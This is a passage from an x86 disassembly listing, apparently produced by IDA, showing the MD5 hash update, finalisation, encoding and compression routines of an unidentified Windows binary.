push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_38]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4881D05h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-262B2FC7h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_20]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1924661Bh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+1FA27CF8h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_48]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3B53A99Bh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
